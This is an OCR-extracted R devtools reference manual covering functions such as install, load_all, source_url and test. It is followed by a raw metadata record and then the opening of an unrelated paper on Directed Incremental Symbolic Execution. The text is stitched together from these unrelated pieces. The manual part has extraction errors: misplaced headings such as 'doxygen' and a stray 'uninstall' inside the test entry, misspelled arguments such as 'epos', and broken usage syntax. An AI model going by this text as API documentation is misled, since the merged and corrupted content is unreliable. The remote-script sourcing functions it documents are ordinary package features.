Call this function if things seem weird and you’re not sure what’s wrong or how to fix it. If this function returns no output everything should be ready for package development.
document
Usage
dev_sitrep(pkg = ".", debug = FALSE)
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
debug
If TRUE, will print out extra information useful for debugging. If FALSE, it will use result cached from a previous run.
Value
A named list, with S3 class dev_sitrep (for printing purposes).
Examples
```r
## Not run:
dev_sitrep()
## End(Not run)
```
doxygen
Use roxygen to document a package.
Description
This function is a wrapper for the roxygen2::roxygenize() function from the roxygen2 package. See the documentation and vignettes of that package to learn how to use roxygen.
Usage
document(pkg = ".", roclets = NULL, quiet = FALSE)
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
roclets
Character vector of roclet names to use with package. The default, NULL, uses the roxygen roclets option, which defaults to c("collate","namespace","rd").
quiet
if TRUE suppresses output from this function.
See Also
roxygen2::roxygenize(), browseVignettes("roxygen2")
install
Install a local development package.
Description
Uses R CMD INSTALL to install the package. Will also try to install dependencies of the package from CRAN, if they're not already installed.
Usage
install(
pkg = ".",
reload = TRUE,
quick = FALSE,
build = !quick,
args =getOption("devtools.install.args"),
quiet = FALSE,
dependencies = NA,
upgrade = "ask",
build_vignettes = FALSE,
keep_source =getOption("keep.source.pkgs"),
force = FALSE,
...
)
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
reload if TRUE (the default), will automatically reload the package after installing.
quick if TRUE skips docs, multiple-architectures, demos, and vignettes, to make installation as fast as possible.
build if TRUE pkgbuild::build()s the package first: this ensures that the installation is completely clean, and prevents any binary artefacts (like `.o`, `.so`) from appearing in your local package directory, but is considerably slower, because every compile has to start from scratch.
args An optional character vector of additional command line arguments to be passed to R CMD INSTALL. This defaults to the value of the option "devtools.install.args".
quiet If TRUE, suppress output.
dependencies Which dependencies do you want to check? Can be a character vector (selecting from "Depends", "Imports", "LinkingTo", "Suggests", or "Enhances"), or a logical vector. TRUE is shorthand for "Depends", "Imports", "LinkingTo" and "Suggests". NA is shorthand for "Depends", "Imports" and "LinkingTo" and is the default. FALSE is shorthand for no dependencies (i.e. just check this package, not its dependencies).
install_deps
upgrade
One of "default", "ask", "always", or "never". "default" respects the value of the R_REMOTES_UPGRADE environment variable if set, and falls back to "ask" if unset. "ask" prompts the user for which out of date packages to upgrade. For non-interactive sessions "ask" is equivalent to "always". TRUE and FALSE are also accepted and correspond to "always" and "never" respectively.
build_vignettes
if TRUE, will build vignettes. Normally it is build that’s responsible for creating vignettes; this argument makes sure vignettes are built even if a build never happens (i.e. because build = FALSE).
keep_source
If TRUE will keep the srcrefs from an installed package. This is useful for debugging (especially inside of RStudio). It defaults to the option "keep.source.pkgs".
force
Force installation, even if the remote state has not changed since the previous install.
... additional arguments passed to remotes::install_deps() when installing dependencies.
Details
If quick = TRUE, installation takes place using the current package directory. If you have compiled code, this means that artefacts of compilation will be created in the src/ directory. If you want to avoid this, you can use build = TRUE to first build a package bundle and then install it from a temporary directory. This is slower, but keeps the source directory pristine.
If the package is loaded, it will be reloaded after installation. This is not always completely possible, see reload() for caveats.
To install a package in a non-default library, use withr::with_libpaths().
See Also
update_packages() to update installed packages from the source location and with_debug() to install packages with debugging flags set.
Other package installation: uninstall()
install_deps
Install package dependencies if needed.
Description
install_deps() will install the user dependencies needed to run the package, install_dev_deps() will also install the development dependencies needed to test and build the package.
install_deps
Usage
install_deps(
pkg = ".",
dependencies = NA,
repos = getOption("repos"),
type = getOption("pkgType"),
upgrade = c("default", "ask", "always", "never"),
quiet = FALSE,
build = TRUE,
build_opts = c("--no-resave-data", "--no-manual", "--no-build-vignettes"),
...
)
install_dev_deps(
pkg = ".",
dependencies = TRUE,
repos = getOption("repos"),
type = getOption("pkgType"),
upgrade = c("default", "ask", "always", "never"),
quiet = FALSE,
build = TRUE,
build_opts = c("--no-resave-data", "--no-manual", "--no-build-vignettes"),
...
)
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
dependencies Which dependencies do you want to check? Can be a character vector (selecting from "Depends", "Imports", "LinkingTo", "Suggests", or "Enhances"), or a logical vector.
TRUE is shorthand for "Depends", "Imports", "LinkingTo" and "Suggests". NA is shorthand for "Depends", "Imports" and "LinkingTo" and is the default. FALSE is shorthand for no dependencies (i.e. just check this package, not its dependencies).
epos A character vector giving repositories to use.
type Type of package to update.
upgrade One of "default", "ask", "always", or "never". "default" respects the value of the R_REMOTES_UPGRADE environment variable if set, and falls back to "ask" if unset. "ask" prompts the user for which out of date packages to upgrade. For non-interactive sessions "ask" is equivalent to "always". TRUE and FALSE are also accepted and correspond to "always" and "never" respectively.
quiet If TRUE, suppress output.
build if TRUE pkgbuild::build()s the package first: this ensures that the installation is completely clean, and prevents any binary artefacts (like ".o", ".so") from
appearing in your local package directory, but is considerably slower, because every compile has to start from scratch.
**build_opts** Options to pass to R CMD build, only used when build
... additional arguments passed to `remotes::install_deps()` when installing dependencies.
**Examples**
```r
## Not run: install_deps(".")
```
---
**lint**
*Lint all source files in a package.*
**Description**
The default linters correspond to the style guide at [http://r-pkgs.had.co.nz/r.html#style](http://r-pkgs.had.co.nz/r.html#style), however it is possible to override any or all of them using the `linters` parameter.
**Usage**
```r
lint(pkg = ".", cache = TRUE, ...)
```
**Arguments**
- **pkg** The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- **cache** store the lint results so repeated lints of the same content use the previous results.
- **...** additional arguments passed to `lintr::lint_package()`
**Details**
The lintr cache is by default stored in `~/.R/lintr_cache/` (this can be configured by setting `options(lintr.cache_directory)`). It can be cleared by calling `lintr::clear_cache()`.
**See Also**
- `lintr::lint_package()`, `lintr::lint()`
Description
load_all loads a package. It roughly simulates what happens when a package is installed and loaded with library().
Usage
load_all(
path = ".",
reset = TRUE,
recompile = FALSE,
export_all = TRUE,
helpers = TRUE,
quiet = FALSE,
...
)
Arguments
path Path to a package, or within a package.
reset clear package environment and reset file cache before loading any pieces of the package. This is equivalent to running unload() and is the default. Use reset = FALSE may be faster for large code bases, but is a significantly less accurate approximation.
recompile DEPRECATED. force a recompile of DLL from source code, if present. This is equivalent to running pkgbuild::.clean_dll() before load_all
export_all If TRUE (the default), export all objects. If FALSE, export only the objects that are listed as exports in the NAMESPACE file.
helpers if TRUE loads testthat test helpers.
quiet if TRUE suppresses output from this function.
... Additional arguments passed to pkgload::load_all().
Details
Currently load_all:
- Loads all data files in data/. See load_data() for more details.
- Sources all R files in the R directory, storing results in environment that behaves like a regular package namespace. See below and load_code() for more details.
- Compiles any C, C++, or Fortran code in the src/ directory and connects the generated DLL into R. See compile_dll() for more details.
- Runs .onAttach(), .onLoad() and .onUnload() functions at the correct times.
If you use `testthat`, will load all test helpers so you can access them interactively. `devtools` sets the `DEVTOOLS_LOAD` environment variable to "true" to let you check whether the helpers are run during package loading.
Namespaces
The namespace environment `<namespace:pkname>`, is a child of the imports environment, which has the name attribute `imports:pkname`. It is in turn is a child of `<namespace:base>`, which is a child of the global environment. (There is also a copy of the base namespace that is a child of the empty environment.)
The package environment `<package:pkname>` is an ancestor of the global environment. Normally when loading a package, the objects listed as exports in the `NAMESPACE` file are copied from the namespace to the package environment. However, `load_all` by default will copy all objects (not just the ones listed as exports) to the package environment. This is useful during development because it makes all objects easy to access.
To export only the objects listed as exports, use `export_all=FALSE`. This more closely simulates behavior when loading an installed package with `library()`, and can be useful for checking for missing exports.
Shim files
`load_all` also inserts shim functions into the imports environment of the loaded package. It presently adds a replacement version of `system.file` which returns different paths from `base::system.file`. This is needed because installed and uninstalled package sources have different directory structures. Note that this is not a perfect replacement for `base::system.file`.
Examples
```r
## Not run:
# Load the package in the current directory
load_all("./")
# Running again loads changed files
load_all("./")
# With reset=TRUE, unload and reload the package for a clean start
load_all("./", TRUE)
# With export_all=FALSE, only objects listed as exports in NAMESPACE are exported
load_all("./", export_all = FALSE)
## End(Not run)
```
missing_s3
Find missing s3 exports.
Description
The method is heuristic - looking for objs with a period in their name.
Usage
missing_s3(pkg = ".")
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
package_file
Find file in a package.
Description
It always starts by walking up the path until it finds the root directory, i.e. a directory containing DESCRIPTION. If it cannot find the root directory, or it can’t find the specified path, it will throw an error.
Usage
package_file(..., path = ".")
Arguments
... Components of the path.
path Place to start search for package directory.
Examples
## Not run:
package_file("figures", "figure_1")
## End(Not run)
release
Release package to CRAN.
Description
Run automated and manual tests, then post package to CRAN.
Usage
release(pkg = ".", check = FALSE, args = NULL)
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
check
if TRUE, run checking, otherwise omit it. This is useful if you’ve just checked your package and you’re ready to release it.
args
An optional character vector of additional command line arguments to be passed to R CMD build.
Details
The package release process will:
- Confirm that the package passes R CMD check on relevant platforms
- Confirm that important files are up-to-date
- Build the package
- Submit the package to CRAN, using comments in "cran-comments.md"
You can add arbitrary extra questions by defining an (un-exported) function called release_questions() that returns a character vector of additional questions to ask.
You also need to read the CRAN repository policy at https://cran.r-project.org/web/packages/policies.html and make sure you’re in line with the policies. release tries to automate as many of polices as possible, but it’s impossible to be completely comprehensive, and they do change in between releases of devtools.
See Also
usethis::use_release_issue() to create a checklist of release tasks that you can use in addition to or in place of release.
**reload**
*Unload and reload package.*
**Description**
This attempts to unload and reload an *installed* package. If the package is not loaded already, it does nothing. It’s not always possible to cleanly unload a package: see the caveats in `unload()` for some of the potential failure points. If in doubt, restart R and reload the package with `library()`.
**Usage**
```r
reload(pkg = ".", quiet = FALSE)
```
**Arguments**
- `pkg` The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `quiet` if TRUE suppresses output from this function.
**See Also**
- `load_all()` to load a package for interactive development.
**Examples**
```r
## Not run:
# Reload package that is in current directory
reload(".")
# Reload package that is in ./ggplot2/
reload("ggplot2/")
# Can use inst() to find the package path
# This will reload the installed ggplot2 package
reload(pkgload::inst("ggplot2"))
## End(Not run)
```
---
**revdep**
*Reverse dependency tools.*
**Description**
Tools to check and notify maintainers of all CRAN and Bioconductor packages that depend on the specified package.
Usage
```r
revdep(
pkg,
dependencies = c("Depends", "Imports", "Suggests", "LinkingTo"),
recursive = FALSE,
ignore = NULL,
bioconductor = FALSE
)
revdep_maintainers(pkg = ".")
```
Arguments
- **pkg**: Package name. This is unlike most devtools packages which take a path because you might want to determine dependencies for a package that you don’t have installed. If omitted, defaults to the name of the current package.
- **dependencies**: A character vector listing the types of dependencies to follow.
- **recursive**: If TRUE look for full set of recursive dependencies.
- **ignore**: A character vector of package names to ignore. These packages will not appear in returned vector.
- **bioconductor**: If TRUE also look for dependencies amongst Bioconductor packages.
Details
The first run in a session will be time-consuming because it must download all package metadata from CRAN and Bioconductor. Subsequent runs will be faster.
See Also
The `revdepcheck` package can be used to run R CMD check on all reverse dependencies.
Examples
```r
## Not run:
revdep("ggplot2")
revdep("ggplot2", ignore = c("xkcd", "zoo"))
## End(Not run)
```
run_examples
Run all examples in a package.
Description
One of the most frustrating parts of R CMD check is getting all of your examples to pass - whenever one fails you need to fix the problem and then restart the whole process. This function makes it a little easier by making it possible to run all examples from an R function.
Usage
```r
run_examples(
pkg = ".",
start = NULL,
show = TRUE,
test = FALSE,
run = TRUE,
fresh = FALSE,
document = TRUE
)
```
Arguments
- `pkg` The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `start` Where to start running the examples: this can either be the name of Rd file to start with (with or without extensions), or a topic name. If omitted, will start with the (lexicographically) first file. This is useful if you have a lot of examples and don’t want to rerun them every time you fix a problem.
- `show` DEPRECATED.
- `test` if TRUE, code in `\donttest{}` will be commented out. If FALSE, code in `\testonly{}` will be commented out.
- `run` if TRUE, code in `\dontrun{}` will be commented out.
- `fresh` if TRUE, will be run in a fresh R session. This has the advantage that there’s no way the examples can depend on anything in the current session, but interactive code (like `browser()`) won’t work.
- `document` if TRUE, `document()` will be run to ensure examples are updated before running them.
### save_all
*Save all documents in an active IDE session.*
**Description**
Helper function wrapping IDE-specific calls to save all documents in the active session. In this form, callers of `save_all()` don’t need to execute any IDE-specific code. This function can be extended to include other IDE implementations of their equivalent `rstudioapi::documentSaveAll()` methods.
**Usage**
```r
save_all()
```
### show_news
*Show package news*
**Description**
Show package news
**Usage**
```r
show_news(pkg = ".", latest = TRUE, ...)
```
**Arguments**
- `pkg`
The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `latest`
if TRUE, only show the news for the most recent version.
- `...`
other arguments passed on to `news`
source_gist
Run a script on gist
Description
“Gist is a simple way to share snippets and pastes with others. All gists are git repositories, so they are automatically versioned, forkable and usable as a git repository.” [https://gist.github.com/](https://gist.github.com/)
Usage
```
source_gist(id, ..., filename = NULL, sha1 = NULL, quiet = FALSE)
```
Arguments
- **id**: either full url (character), gist ID (numeric or character of numeric).
- **...**: other options passed to `source()`
- **filename**: if there is more than one R file in the gist, which one to source (filename ending in `.R`)? Default NULL will source the first file.
- **sha1**: The SHA-1 hash of the file at the remote URL. This is highly recommend as it prevents you from accidentally running code that’s not what you expect. See `source_url()` for more information on using a SHA-1 hash.
- **quiet**: if FALSE, the default, prints informative messages.
See Also
`source_url()`
Examples
```
## Not run:
# You can run gists given their id
source_gist(6872663)
source_gist("6872663")
# Or their html url
source_gist("https://gist.github.com/hadley/6872663")
source_gist("gist.github.com/hadley/6872663")
# It's highly recommend that you run source_gist with the optional
# sha1 argument - this will throw an error if the file has changed since
# you first ran it
source_gist(6872663, sha1 = "54f1db27e60")
# Wrong hash will result in error
source_gist(6872663, sha1 = "54f1db27e61")
#' # You can speficy a particular R file in the gist
source_gist(6872663, filename = "hi.r")
source_gist(6872663, filename = "hi.r", sha1 = "54f1db27e60")
```
source_url
Run a script through some protocols such as http, https, ftp, etc.
Description
If a SHA-1 hash is specified with the `sha1` argument, then this function will check the SHA-1 hash of the downloaded file to make sure it matches the expected value, and throw an error if it does not match. If the SHA-1 hash is not specified, it will print a message displaying the hash of the downloaded file. The purpose of this is to improve security when running remotely-hosted code; if you have a hash of the file, you can be sure that it has not changed. For convenience, it is possible to use a truncated SHA1 hash, down to 6 characters, but keep in mind that a truncated hash won’t be as secure as the full hash.
Usage
`source_url(url, ..., sha1 = NULL)`
Arguments
- `url` url
- `...` other options passed to `source()`
- `sha1` The (prefix of the) SHA-1 hash of the file at the remote URL.
See Also
`source_gist()`
Examples
```r
## Not run:
source_url("https://gist.github.com/hadley/6872663/raw/hi.r")
# With a hash, to make sure the remote file hasn't changed
source_url("https://gist.github.com/hadley/6872663/raw/hi.r",
sha1 = "54f1db27e60b8b7e0486d78560490b49e8fe9f9")
# With a truncated hash
source_url("https://gist.github.com/hadley/6872663/raw/hi.r",
sha1 = "54f1db27e60")
## End(Not run)
```
spell_check
Spell checking
Description
Runs a spell check on text fields in the package description file, manual pages, and optionally vignettes. Wraps the spelling package.
Usage
spell_check(pkg = ".", vignettes = TRUE, use_wordlist = TRUE)
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
vignettes also check all rmd and rnw files in the pkg vignettes folder
use_wordlist ignore words in the package WORDLIST file
---
test Execute test_that tests in a package.
Description
test() is a shortcut for testthat::test_dir(), it runs all of a package’s tests. test_file runs test() on the active file. test_coverage() computes test coverage for your package. It is a shortcut for covr::package_coverage() and covr::report(). test_coverage_file() computes test coverage for the active file. Is a shortcut for covr::file_coverage() and covr::report().
Usage
test(pkg = ".", filter = NULL, stop_on_failure = FALSE, export_all = TRUE, ...)
test_coverage(pkg = ".", show_report = interactive(), ...)
uses_testthat(pkg = ".")
test_file(file = find_active_file(), ...)
test_coverage_file(
file = find_active_file(),
filter = TRUE,
show_report = interactive(),
export_all = TRUE,
...)
)
uninstall
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
filter
If not NULL, only tests with file names matching this regular expression will be executed. Matching be performed on the file name after it has been stripped of "test-" and ".R".
stop_on_failure
If TRUE, throw an error if any tests fail.
For historical reasons, the default value of stop_on_failure is TRUE for test_package() and test_check() but FALSE for test_dir(), so if you’re calling test_dir() you may want to consider explicitly setting stop_on_failure = TRUE.
export_all
If TRUE (the default), export all objects. If FALSE, export only the objects that are listed as exports in the NAMESPACE file.
... additional arguments passed to testthat::test_dir() and covr::package_coverage()
show_report
Show the test coverage report.
file
One or more source or test files. If a source file the corresponding test file will be run. The default is to use the active file in RStudio (if available).
Description
Uninstall a local development package.
Usage
uninstall(pkg = ".", unload = TRUE, quiet = FALSE, lib = .libPaths()[[1]])
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
unload
if TRUE (the default), will automatically unload the package prior to uninstalling.
quiet
If TRUE, suppress output.
lib
a character vector giving the library directories to remove the packages from. If missing, defaults to the first element in .libPaths().
See Also
with_debug() to install packages with debugging flags set.
Other package installation: install()
`wd`
*Set working directory.*
**Description**
Set working directory.
**Usage**
`wd(pkg = ".", path = "")`
**Arguments**
- `pkg`
The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `path`
path within package. Leave empty to change working directory to package directory.
Index
*Topic programming
build_vignettes, 5
run_examples, 27
.libPaths, 32
.libPaths(), 15
activates, 13
as.package(), 3, 4, 6, 7, 9, 10, 12, 16, 17, 19, 20, 23–25, 27, 28, 31–33
bash, 2
browser(), 27
build, 3
build(), 10
build_manual, 4
build_readme, 4
build_site, 5
build_vignettes, 5
check, 6
check(), 9
check_built (check), 6
check_failures, 9
check_man, 9
check_rhub, 10, 12
check_win, 11, 11
check_win_devel (check_win), 11
check_win_oldderel (check_win), 11
clean_vignettes, 12
clean_vignettes(), 6
compile_dll(), 21
compiler_flags, 8
covr::file_coverage(), 31
covr::package_coverage(), 31, 32
covr::report(), 31
create, 13
dev_mode, 15
dev_mode(), 14
dev_sitrep, 15
devtools, 13
devtools-package (devtools), 13
document, 16
document(), 7, 27
install, 17, 32
install(), 14
install_deps, 18
install_dev_deps (install_deps), 18
library(), 21, 22, 25
lint, 20
lintr::clear_cache(), 20
lintr::lint(), 20
lintr::lint_package(), 20
load_all, 21
load_all(), 25
load_code(), 21
load_data(), 21
missing_s3, 23
options(), 14
package_file, 23
pkgbuild::build, 4
pkgbuild::build(), 7, 12, 17, 19
pkgbuild::clean_dll(), 21
pkgdown::build_site(), 5
pkgload::load_all(), 21
r_env_vars(), 8
Rd2pdf(), 4
release, 24
release(), 8
reload, 25
reload(), 18
remotes::install_deps(), 18, 20
revdepl, 25
revdep_maintainers (revdep), 25
34
rhub::check_for_cran(), 10
rhub::platforms(), 10
rhub::validate_email(), 11
rmarkdown::render(), 4
roxygen2::roxygenize(), 16
run_examples, 27
save_all, 28
show_news, 28
source(), 29, 30
source_gist, 29
source_gist(), 30
source_url, 30
source_url(), 29
spell_check, 31
spelling, 31
test, 31
test_coverage(test), 31
test_coverage_file(test), 31
test_file(test), 31
testthat::test_dir(), 31, 32
uninstall, 18, 32
unload(), 21, 25
update_packages(), 18
use_description(), 13
use_rstudio(), 13
uses_testthat(test), 31
usethis::use_release_issue(), 24
utils::as.person(), 14
wd, 33
with_debug(), 18, 32
withr::with_libpaths(), 18, 32
WORDLIST, 31
|
{"Source-Url": "http://cran.fhcrc.org/web/packages/devtools/devtools.pdf", "len_cl100k_base": 11379, "olmocr-version": "0.1.53", "pdf-total-pages": 35, "total-fallback-pages": 0, "total-input-tokens": 72410, "total-output-tokens": 13785, "length": "2e13", "weborganizer": {"__label__adult": 0.00038051605224609375, "__label__art_design": 0.0003533363342285156, "__label__crime_law": 0.00015020370483398438, "__label__education_jobs": 0.00048732757568359375, "__label__entertainment": 0.0001137852668762207, "__label__fashion_beauty": 9.304285049438477e-05, "__label__finance_business": 0.00011539459228515624, "__label__food_dining": 0.0002155303955078125, "__label__games": 0.0009531974792480468, "__label__hardware": 0.0003910064697265625, "__label__health": 0.00013148784637451172, "__label__history": 0.0001512765884399414, "__label__home_hobbies": 8.368492126464844e-05, "__label__industrial": 0.00013959407806396484, "__label__literature": 0.0002512931823730469, "__label__politics": 0.0001481771469116211, "__label__religion": 0.00034618377685546875, "__label__science_tech": 0.001224517822265625, "__label__social_life": 0.00013446807861328125, "__label__software": 0.01763916015625, "__label__software_dev": 0.97607421875, "__label__sports_fitness": 0.00019919872283935547, "__label__transportation": 0.0001608133316040039, "__label__travel": 0.0001971721649169922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46533, 0.01985]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46533, 0.30303]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46533, 0.72676]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 2334, false], [2334, 3882, null], [3882, 4808, null], [4808, 6090, null], [6090, 7935, null], [7935, 9492, null], [9492, 11694, null], [11694, 12803, null], [12803, 14236, null], [14236, 15280, null], [15280, 16645, null], [16645, 17639, null], [17639, 18946, null], [18946, 20145, null], [20145, 21303, null], [21303, 23034, null], [23034, 25041, null], [25041, 26849, null], [26849, 28089, null], [28089, 29581, null], [29581, 31527, null], [31527, 32277, null], [32277, 33668, null], [33668, 34833, null], [34833, 35997, null], [35997, 37437, null], [37437, 38244, null], [38244, 39874, null], [39874, 41214, null], [41214, 42506, null], [42506, 44208, null], [44208, 44559, null], [44559, 45892, null], [45892, 46533, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 2334, true], [2334, 3882, null], [3882, 4808, null], [4808, 6090, null], [6090, 7935, null], [7935, 9492, null], [9492, 11694, null], [11694, 12803, null], [12803, 14236, null], [14236, 15280, null], [15280, 16645, null], [16645, 17639, null], [17639, 18946, null], [18946, 20145, null], [20145, 21303, null], [21303, 23034, null], [23034, 25041, null], [25041, 26849, null], [26849, 28089, null], [28089, 29581, null], [29581, 31527, null], [31527, 32277, null], [32277, 33668, null], [33668, 34833, null], [34833, 35997, null], [35997, 37437, null], [37437, 38244, null], [38244, 39874, null], [39874, 41214, null], [41214, 42506, null], [42506, 44208, null], [44208, 44559, null], [44559, 45892, null], [45892, 46533, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 46533, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46533, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46533, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46533, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46533, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46533, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46533, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46533, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46533, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46533, null]], "pdf_page_numbers": [[0, 0, 1], [0, 2334, 2], [2334, 3882, 3], [3882, 4808, 4], [4808, 6090, 5], [6090, 7935, 6], [7935, 9492, 7], [9492, 11694, 8], [11694, 12803, 9], [12803, 14236, 10], [14236, 15280, 11], [15280, 16645, 12], [16645, 17639, 13], [17639, 18946, 14], [18946, 20145, 15], [20145, 21303, 16], [21303, 23034, 17], [23034, 25041, 18], [25041, 26849, 19], [26849, 28089, 20], [28089, 29581, 21], [29581, 31527, 22], [31527, 32277, 23], [32277, 33668, 24], [33668, 34833, 25], [34833, 35997, 26], [35997, 37437, 27], [37437, 38244, 28], [38244, 39874, 29], [39874, 41214, 30], [41214, 42506, 31], [42506, 44208, 32], [44208, 44559, 33], [44559, 45892, 34], [45892, 46533, 35]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46533, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-09
|
2024-12-09
|
2cbeb72582a683dc17f9847ce54d42f0e1eb7ce3
|
Directed Incremental Symbolic Execution
Suzette Person
NASA Langley Research Center
suzette.person@nasa.gov
Guowei Yang
University of Texas at Austin
gyang@ece.utexas.edu
Neha Rungta
NASA Ames Research Center
neha.s.rungta@nasa.gov
Sarfraz Khurshid
University of Texas at Austin
khurshid@ece.utexas.edu
Abstract
The last few years have seen a resurgence of interest in the use of symbolic execution—a program analysis technique developed more than three decades ago to analyze program execution paths. Scaling symbolic execution and other path-sensitive analysis techniques to large systems remains challenging despite recent algorithmic and technological advances. An alternative to solving the problem of scalability is to reduce the scope of the analysis. One approach that is widely studied in the context of regression analysis is to analyze the differences between two related program versions. While such an approach is intuitive in theory, finding efficient and precise ways to identify program differences, and characterize their effects on how the program executes has proved challenging in practice.
In this paper, we present Directed Incremental Symbolic Execution (DiSE), a novel technique for detecting and characterizing the effects of program changes. The novelty of DiSE is to combine the efficiencies of static analysis techniques to compute program difference information with the precision of symbolic execution to explore program execution paths and generate path conditions affected by the differences. DiSE is a complementary technique to other reduction or bounding techniques developed to improve symbolic execution. Furthermore, DiSE does not require analysis results to be carried forward as the software evolves—only the source code for two related program versions is required. A case-study of our implementation of DiSE illustrates its effectiveness at detecting and characterizing the effects of program changes.
Categories and Subject Descriptors D.2.5 [Software Engineering]: Testing and Debugging—Symbolic execution
General Terms Verification, Algorithms
Keywords Program Differencing, Symbolic Execution, Software Evolution
1. Introduction
Over the last three decades, symbolic execution [7, 22]—a program analysis technique for systematic exploration of program execution paths using symbolic input values—has provided a basis for various software testing and verification techniques. For each path it explores, symbolic execution builds a path condition, i.e., constraints on the symbolic inputs, that characterizes the program execution path. During symbolic execution, satisfiability checks are performed each time a constraint is added to the path condition to determine the feasibility of the path; if a path condition becomes unsatisfiable, it represents an infeasible path and symbolic execution does not consider any other paths that contain the known infeasible path as its prefix. The set of path conditions computed by symbolic execution can be used to perform various analyses of program behavior, for example, to check conformance of code to rich behavioral specifications using automated test input generation [10, 19].
Initial work on symbolic execution largely focused on checking properties of programs with primitive types, such as integers and booleans [7, 22]. Several recent projects generalized the core ideas of symbolic execution which enabled it to be applied to programs with more general types, including references and arrays [4, 10, 12, 19, 32]. These generalizations have been complimented by recent advances in constraint solving, which is the key supporting technology that affects the effectiveness of symbolic execution—checking path conditions for satisfiability relies heavily on the capabilities of the underlying constraint solvers. During the last few years, not only has raw computing power increased, enabling more efficient constraint solving, but basic constraint solving technology has also advanced considerably, specifically in leveraging multiple decision procedures in synergy, for example, as in Satisfiability Modulo Theory (SMT) solvers [9].
Scaling symbolic execution, as with other path-sensitive analyses, remains challenging because of the large number of execution paths generated during the symbolic analysis. This is known as the path explosion problem, and despite recent advances in reduction and abstraction techniques, remains a fundamental challenge to path-sensitive analysis techniques. A large body of work has been dedicated to developing techniques that try to achieve better scalability [1, 3, 11, 20]. One alternative approach to solving the problem of scalability is to reduce the scope of the analysis to only certain parts of the program.
Regression analysis is a well known example where the differences between program versions serve as the basis to reduce the scope of the analysis [14, 35, 38]. Analyses based on program
differences are attractive and have considerable potential benefits since most software is developed following an evolutionary process. And, with the recent push toward agile development, differences between two program versions tend to be small and localized. The challenge, however, lies in determining precisely which program execution behaviors are affected by the program changes. Techniques to identify modified parts of the program can be broadly classified into two categories: syntactic and semantic. Syntactic techniques consider differences in the program source code or some other static representation of the source and can be computed efficiently. Semantic techniques are typically more expensive, but also compute generally more precise differences by considering the differences in the execution behaviors of the program.
In Directed Incremental Symbolic Execution (DiSE), our insight is to combine the efficiencies of static analysis techniques that compute program difference information with the precision of symbolic execution. The path conditions computed by DiSE then characterize the differences between two related program versions. The essence of symbolic execution is that it abstracts the semantics of program behaviors by generating constraints on the program inputs. The constraints for a given program execution behavior (path), referred to as a path condition, encode the input values that will cause execution to follow that path. The goal of this work is to direct symbolic execution on a modified program version to explore path conditions that may be affected by the changes. Consider a set of concrete (actual) input values that generate paths $p$ and $p'$ in the original and modified versions of the program respectively. If symbolic execution of $p$ and $p'$ result in different path conditions, then the path condition generated along $p'$ is termed as affected.
Affected path conditions can be solved to generate values for the variables which, when used to execute the program, exhibit the affected program behaviors. The results of DiSE can then be used by subsequent program analysis techniques to focus on only the program behaviors that are affected by the changes to the program. DiSE enables other program analysis techniques to efficiently perform software evolution tasks such as program documentation, regression testing, fault localization, and program summarization.
The novelty of DiSE is to leverage the state-of-the-art in symbolic execution and apply static analyses in synergy to enable more efficient symbolic execution of programs as they evolve. Static analysis and symbolic execution form the two phases in DiSE. Program instructions whose execution may lead to the generation of affected path conditions are termed as affected locations or affected instructions. The goal of the first phase is to generate the set of affected program instructions. The static analysis techniques in the first phase are based on intra-procedural data and control flow dependences. The dependence analyses are used to identify instructions in the source code that define program variables relevant to changes in the program. Conditional branch instructions that use those variables, or are themselves affected by the changes, are also identified as affected. In the second phase, the information generated by the static analysis is used to direct symbolic execution to explore only the parts of the programs affected by the changes, potentially avoiding a large number of unaffected execution paths. DiSE generates, as output, path conditions only on conditional branch instructions that use variables affected by the change or are otherwise affected by the changes.
In this work, we develop a conceptual framework for DiSE, implement a prototype of our framework in the Java PathFinder symbolic execution framework [26, 28, 36], present a case-study to demonstrate the effectiveness of our approach, and demonstrate, as a proof of concept, how the framework enables incremental program analysis to perform software evolution related tasks. For the examples used in our case-study, DiSE consistently explores fewer states and takes less time to generate fewer path conditions compared to standard symbolic execution when the changes affect only a subset of the program execution paths. This demonstrates the effectiveness of DiSE in terms of reducing the cost of symbolic execution of evolving software. Furthermore, we apply the results of our analysis to test case selection and augmentation to demonstrate the utility of such an analysis.
We make the following contributions:
- A novel incremental analysis that leverages the state-of-the-art in symbolic execution and applies a static analysis in synergy to enable efficient symbolic execution of programs as they undergo changes.
